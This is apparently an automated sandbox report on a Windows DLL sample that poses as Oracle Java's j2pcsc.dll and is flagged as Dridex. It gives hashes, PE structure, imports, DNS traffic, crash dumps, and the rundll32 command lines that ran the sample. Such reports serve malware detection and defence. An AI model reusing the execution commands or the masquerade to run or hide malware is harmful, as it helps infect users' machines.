SSDEEP:	48:cvIwSD8zstJgtWI9n/WSC8Bb8fm8M4JCdskN4lFi+q8/9NGPGk4SrS6d:uITfHUuSNCJ2N4CmNGtDW6d
MD5:	3134EDDD2FDD88A1D65DB9756C231EB8
SHA1:	7660D8D31893A8C6AAE866B4909CC79928B451F7
SHA-256:	88F009E69E0E5966A9F26A35F46D57A07C92C907F7723946097FE0714C1E8078
SHA-512:	910BAB55C74041FDB6016F9BF7F2F38AAE0A4F2EA2EB70E68BBE2969363BC2E3EE3052AAA376E6CC3527031A8DB11465DEF8EB40A72E0FB7055D6BB892DCCF48
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="975716" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD97E.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed May 5 04:44:53 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	46648
Entropy (8bit):	2.4535395835887615
Encrypted:	false
SSDEEP:	192:9umavpqvZkOvC3hcnoZofEaBqAWVbvx2p5R+6J86cndbpU:ivMRd67ruqlbvQJJ2DU
MD5:	7AE3527170E540035BDD93E0EE31C096
SHA1:	14A3BA01D791E538CDF6845415F8D025C89C4931
SHA-256:	A31507D3C30BE23DCC3FD2163DAC1DDD8A885372CDA1371D70155DE170E41007
SHA-512:	4C9E6C15030CE194524D6806935938F0194CBA2CB0C41D1A29EE6B3AED10DBB93FB84853C3463DB20F15269390B1E93F55F5F9E802C6E8FC5E24737E08DA687F
Malicious:	false
Preview:	MDMP....... ........".`...................U...........B....... ......GenuineIntelW...........T............".`.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE0E2.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8308
Entropy (8bit):	3.702193352850464
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiJP6P6YBVq62lgmfTHPSXeCprN89bOQsf5am:RrlsNiB6P6YBo62lgmfTHPScOjfF
MD5:	5B80932A4AC95EB65E3ACA9DDA87E718
SHA1:	9B9BE79028FC60FFDC206B5D68ABBAEF95FD33ED
SHA-256:	D65FC1C0C6358462EB3491E6D175B3C590390198D602F9DE58A29DAE9B84F815
SHA-512:	AFBDFAB58086D61B8745AA988629588E08E93DAF3F98771AB9EB02BFDCF64A2AA2381B166407BED1DBAFCCE10B0AD8DF401AC81371E72CAFA0D96072073A91D4
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.8.8.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE1AE.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4679
Entropy (8bit):	4.510648672121708
Encrypted:	false
SSDEEP:	48:cvIwSD8zsEJgtWI9n/WSC8BY8fm8M4JCdsrZFE+q8/3UM4SrSH1d:uITfCUuSNTJpovMDWH1d
MD5:	3D916DD79CDE1C883423BD9B839B953F
SHA1:	62CA53FF330706120B5519B143FCEC7BD6DB4247
SHA-256:	681344A6C49F9419C18BD31836A0B7D655253DE18874C3B9AE80054B0E2CE14D
SHA-512:	A97E39D45F37CA5D0EDD5854C1442002588F8C17923BC63537C92D0A41E06208A81BFCB0B760003E16822B918046947B4026EF01DD7BF70EFC01B8070386D2F0
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="975715" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE342.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed May 5 04:44:57 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	55668
Entropy (8bit):	2.2904308539354665
Encrypted:	false
SSDEEP:	192:y+zeWh19dnkac2JDEj1aI/980h3AMCCcDqiSP3FjYZdIhZ0ynImBo2uPzhcB:pzeWldFcC0w6mGCE5P5YZi9XxubyB
MD5:	E34E085293DC18A24A3DDC8F35287D65
SHA1:	28270F46B36994AC7DF344FEFAB8642DE830AB19
SHA-256:	7BB4A909167FB906A87CDE2A234E95186ABD940C21F9BFA7844C38AF1B2B02FF
SHA-512:	682AFA5F0552E934EC6E8FC90607E02354376166296FE80E9C35004F2721BB6F45F34469316F9EF0AA5A3A26C9D35073EDB092883A62C9AEE6BD6AE1CB0F7C19
Malicious:	false
Preview:	MDMP....... ........".`...................U...........B......."......GenuineIntelW...........T............".`.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF66D.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8380
Entropy (8bit):	3.6919968957861586
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNind606YBAV6L6Cdgmf8GHS7CpBg89b7XsfFpm:RrlsNid606YB66WCdgmf8USM7cfC
MD5:	4D4A7E4D09FAA799E97D6176C63AE803
SHA1:	E0BC1FD43A1BF867A6102731AAEEFDB0A7FE95D8
SHA-256:	FE002D89650D220CD275724E3C7982D0B82FA48C3DA934A67DA7CF5F00C36815
SHA-512:	4DB6A8811591527BEA21D2AB760DFD25405436599894AA0920D4E04F8D888113C5202A293C3FDFA09B1D0E3F196CBC4933E0F1DE7ADA46468213282E9C9259A5
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.8.6.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF833.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4766
Entropy (8bit):	4.458276862803724
Encrypted:	false
SSDEEP:	48:cvIwSD8zsEJgtWI9n/WSC8Bh8fm8M4JCdskN4fFApF+q8vjskN4T4SrSCd:uITfCUuSNsJ2N4KfKrN4TDWCd
MD5:	0A2B816991697FE1C620267C2B0C607A
SHA1:	9A1F08BA075938CADB65A79F3ADD7F34875D86B5
SHA-256:	BF2E2E4527DC9096AAF9EE9856E38D289EDFF1F72CE97F6E55B9E7B03DED5413
SHA-512:	2DB64775768B9E633663A98263550F1583C0D72257FAE05A7AB34E56FEB9237B903C5731B9714C431026FE5AFCEDDC9DF2025E39C5348F3A6D7E8964D6D4A3FD
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="975715" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.53604314211802
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	fc0bc077_by_Libranalysis.dll
File size:	164864
MD5:	fc0bc07721ce94bc9b100e7c846a1210
SHA1:	2d98f05fb78cd75bb44a0087bead8c1604545d07
SHA256:	e707edac036a1a2d08b746c6a50ac0f0e2b1ba1c2668aadf87ea11b666b0eb28
SHA512:	148d0dbd3b2cfa7a9182f073e13a83bbbf5cbce934b04366b539799007df341bf953308647f0bee16e351b3716f25e4e10c349dfda5bae70ded3cae208621b35
SSDEEP:	3072:sC2X+QFg3UutDvUvoU8pz6EJEEhu6Tzace9kuaGA81/YXKHML/Vp8AF:MG3rUvoU4JE/Wzan9T7B/CKsL/Vy
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t.%.0zK.0zK.0zK.0zJ.}{K...3..{K.....P{K...3..zK.V....zK...1..{K......zK.Rich0zK.........................................PE..L..

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x100241a0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x60903ADD [Mon May 3 18:03:09 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	f108efab351dd21acb187c36805c5bbe

Entrypoint Preview

Instruction
mov edx, eax
xor eax, eax
add eax, 00002233h
cmpss xmm1, xmm2, 03h
sub eax, 00002233h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
cmpss xmm1, xmm2, 03h
cmp eax, 01h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h

Rich Headers

Programming Language:

[RES] VS2012 UPD3 build 60610
[LNK] VS2005 build 50727
[EXP] VS2005 build 50727
[ C ] VS2012 UPD4 build 61030
[IMP] VS2013 UPD2 build 30501

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x27730	0x55	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x27804	0x59	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2c000	0x3a0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2d000	0x1220
IMAGE_DIRECTORY_ENTRY_DEBUG	0x10018	0x38	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x25000	0x60	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x23322	0x23400	False	0.759010693706	data	7.5511794748	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x25000	0x2e39	0x2c00	False	0.770774147727	data	7.47865520081	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata	0x28000	0x336c	0x1800	False	0.78564453125	MMDF mailbox	7.42299069747	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x2c000	0x48c	0x400	False	0.4091796875	data	3.06807977608	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2d000	0x258	0x400	False	0.5263671875	data	4.16057022331	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x2c060	0x33c	data

Imports

DLL	Import
msvcrt.dll	memset
ADVAPI32.dll	RegOverridePredefKey
ole32.dll	CreatePointerMoniker, CreateStreamOnHGlobal
USER32.dll	TranslateMessage
OPENGL32.dll	glTexSubImage1D
KERNEL32.dll	CloseHandle, OutputDebugStringA, LoadLibraryExW, CreateFileW, GetProfileSectionW, LoadLibraryW, GetProfileSectionA, OpenSemaphoreW
RASAPI32.dll	RasGetConnectionStatistics
CLUSAPI.dll	ClusterEnum

Exports

Name	Ordinal	Address
LoxmtYt	1	0x10027776

Version Infos

Description	Data
LegalCopyright	Copyright 2018
InternalName	j2pcsc
FileVersion	8.0.1710.11
Full Version	1.8.0_171-b11
CompanyName	Oracle Corporation
ProductName	Java(TM) Platform SE 8
ProductVersion	8.0.1710.11
FileDescription	Java(TM) Platform SE binary
OriginalFilename	j2pcsc.dll
Translation	0x0000 0x04b0

Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2021 21:43:07.290054083 CEST	50620	53	192.168.2.3	8.8.8.8
May 4, 2021 21:43:07.340730906 CEST	53	50620	8.8.8.8	192.168.2.3
May 4, 2021 21:43:08.356738091 CEST	64938	53	192.168.2.3	8.8.8.8
May 4, 2021 21:43:08.410634995 CEST	53	64938	8.8.8.8	192.168.2.3
May 4, 2021 21:43:08.711296082 CEST	60152	53	192.168.2.3	8.8.8.8
May 4, 2021 21:43:08.771044970 CEST	53	60152	8.8.8.8	192.168.2.3
May 4, 2021 21:43:09.556556940 CEST	57544	53	192.168.2.3	8.8.8.8
May 4, 2021 21:43:09.621206999 CEST	53	57544	8.8.8.8	192.168.2.3
May 4, 2021 21:43:10.489531994 CEST	55984	53	192.168.2.3	8.8.8.8
May 4, 2021 21:43:10.539915085 CEST	53	55984	8.8.8.8	192.168.2.3
May 4, 2021 21:43:11.973864079 CEST	64185	53	192.168.2.3	8.8.8.8
May 4, 2021 21:43:12.027225018 CEST	53	64185	8.8.8.8	192.168.2.3
May 4, 2021 21:43:13.452745914 CEST	65110	53	192.168.2.3	8.8.8.8
May 4, 2021 21:43:13.501549006 CEST	53	65110	8.8.8.8	192.168.2.3
May 4, 2021 21:43:14.552916050 CEST	58361	53	192.168.2.3	8.8.8.8
May 4, 2021 21:43:14.602003098 CEST	53	58361	8.8.8.8	192.168.2.3
May 4, 2021 21:43:15.522281885 CEST	63492	53	192.168.2.3	8.8.8.8
May 4, 2021 21:43:15.570959091 CEST	53	63492	8.8.8.8	192.168.2.3
May 4, 2021 21:43:45.853096008 CEST	60831	53	192.168.2.3	8.8.8.8
May 4, 2021 21:43:45.936233997 CEST	53	60831	8.8.8.8	192.168.2.3
May 4, 2021 21:43:58.366470098 CEST	60100	53	192.168.2.3	8.8.8.8
May 4, 2021 21:43:58.420455933 CEST	53	60100	8.8.8.8	192.168.2.3
May 4, 2021 21:43:59.903868914 CEST	53195	53	192.168.2.3	8.8.8.8
May 4, 2021 21:43:59.963656902 CEST	53	53195	8.8.8.8	192.168.2.3
May 4, 2021 21:44:01.529102087 CEST	50141	53	192.168.2.3	8.8.8.8
May 4, 2021 21:44:01.580902100 CEST	53	50141	8.8.8.8	192.168.2.3
May 4, 2021 21:44:01.986046076 CEST	53023	53	192.168.2.3	8.8.8.8
May 4, 2021 21:44:02.046535969 CEST	53	53023	8.8.8.8	192.168.2.3
May 4, 2021 21:44:04.101972103 CEST	49563	53	192.168.2.3	8.8.8.8
May 4, 2021 21:44:04.158121109 CEST	53	49563	8.8.8.8	192.168.2.3
May 4, 2021 21:45:20.032542944 CEST	51352	53	192.168.2.3	8.8.8.8
May 4, 2021 21:45:20.107333899 CEST	59349	53	192.168.2.3	8.8.8.8
May 4, 2021 21:45:20.127286911 CEST	53	51352	8.8.8.8	192.168.2.3
May 4, 2021 21:45:20.158092022 CEST	53	59349	8.8.8.8	192.168.2.3
May 4, 2021 21:45:20.577899933 CEST	57084	53	192.168.2.3	8.8.8.8
May 4, 2021 21:45:20.637445927 CEST	53	57084	8.8.8.8	192.168.2.3
May 4, 2021 21:45:21.121624947 CEST	58823	53	192.168.2.3	8.8.8.8
May 4, 2021 21:45:21.155797958 CEST	57568	53	192.168.2.3	8.8.8.8
May 4, 2021 21:45:21.170548916 CEST	53	58823	8.8.8.8	192.168.2.3
May 4, 2021 21:45:21.214432001 CEST	53	57568	8.8.8.8	192.168.2.3
May 4, 2021 21:45:21.667354107 CEST	50540	53	192.168.2.3	8.8.8.8
May 4, 2021 21:45:21.725111961 CEST	53	50540	8.8.8.8	192.168.2.3
May 4, 2021 21:45:22.202001095 CEST	54366	53	192.168.2.3	8.8.8.8
May 4, 2021 21:45:22.208492994 CEST	53034	53	192.168.2.3	8.8.8.8
May 4, 2021 21:45:22.250680923 CEST	53	54366	8.8.8.8	192.168.2.3
May 4, 2021 21:45:22.260543108 CEST	53	53034	8.8.8.8	192.168.2.3
May 4, 2021 21:45:23.365561008 CEST	57762	53	192.168.2.3	8.8.8.8
May 4, 2021 21:45:23.380847931 CEST	55435	53	192.168.2.3	8.8.8.8
May 4, 2021 21:45:23.429649115 CEST	53	55435	8.8.8.8	192.168.2.3
May 4, 2021 21:45:23.430177927 CEST	53	57762	8.8.8.8	192.168.2.3
May 4, 2021 21:45:23.492109060 CEST	50713	53	192.168.2.3	8.8.8.8
May 4, 2021 21:45:23.549302101 CEST	53	50713	8.8.8.8	192.168.2.3
May 4, 2021 21:45:23.920649052 CEST	56132	53	192.168.2.3	8.8.8.8
May 4, 2021 21:45:23.966571093 CEST	58987	53	192.168.2.3	8.8.8.8
May 4, 2021 21:45:23.981606007 CEST	53	56132	8.8.8.8	192.168.2.3
May 4, 2021 21:45:24.023734093 CEST	53	58987	8.8.8.8	192.168.2.3
May 4, 2021 21:45:24.175579071 CEST	56579	53	192.168.2.3	8.8.8.8
May 4, 2021 21:45:24.226135015 CEST	53	56579	8.8.8.8	192.168.2.3
May 4, 2021 21:45:24.973644972 CEST	60633	53	192.168.2.3	8.8.8.8
May 4, 2021 21:45:25.030881882 CEST	53	60633	8.8.8.8	192.168.2.3
May 4, 2021 21:45:25.818038940 CEST	61292	53	192.168.2.3	8.8.8.8
May 4, 2021 21:45:25.878962040 CEST	53	61292	8.8.8.8	192.168.2.3
May 4, 2021 21:45:26.423403978 CEST	63619	53	192.168.2.3	8.8.8.8
May 4, 2021 21:45:26.480717897 CEST	53	63619	8.8.8.8	192.168.2.3
May 4, 2021 21:45:27.331106901 CEST	64938	53	192.168.2.3	8.8.8.8
May 4, 2021 21:45:27.382663965 CEST	53	64938	8.8.8.8	192.168.2.3
May 4, 2021 21:46:02.031594992 CEST	61946	53	192.168.2.3	8.8.8.8
May 4, 2021 21:46:02.091624975 CEST	53	61946	8.8.8.8	192.168.2.3
May 4, 2021 21:46:09.996799946 CEST	64910	53	192.168.2.3	8.8.8.8
May 4, 2021 21:46:10.050515890 CEST	53	64910	8.8.8.8	192.168.2.3
May 4, 2021 21:46:22.169416904 CEST	52123	53	192.168.2.3	8.8.8.8
May 4, 2021 21:46:22.219254971 CEST	53	52123	8.8.8.8	192.168.2.3

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Type	Class
May 4, 2021 21:45:20.127286911 CEST	8.8.8.8	192.168.2.3	0x80ed	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net	CNAME (Canonical name)	IN (0x0001)
May 4, 2021 21:45:20.637445927 CEST	8.8.8.8	192.168.2.3	0xe98c	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net	CNAME (Canonical name)	IN (0x0001)
May 4, 2021 21:45:21.214432001 CEST	8.8.8.8	192.168.2.3	0x72fd	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net	CNAME (Canonical name)	IN (0x0001)
May 4, 2021 21:45:21.725111961 CEST	8.8.8.8	192.168.2.3	0x16d1	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net	CNAME (Canonical name)	IN (0x0001)
May 4, 2021 21:45:26.480717897 CEST	8.8.8.8	192.168.2.3	0x568	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net	CNAME (Canonical name)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 5980 Parent PID: 5684

General

Start time:	21:44:06
Start date:	04/05/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll'
Imagebase:	0x190000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 5984 Parent PID: 5980

General

Start time:	21:44:06
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll',#1
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4860 Parent PID: 5980

General

Start time:	21:44:06
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll,LoxmtYt
Imagebase:	0x1c0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4088 Parent PID: 5984

General

Start time:	21:44:06
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll',#1
Imagebase:	0x1c0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000002.326004095.0000000010001000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 1848 Parent PID: 4088

General

Start time:	21:44:50
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 760
Imagebase:	0xa80000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
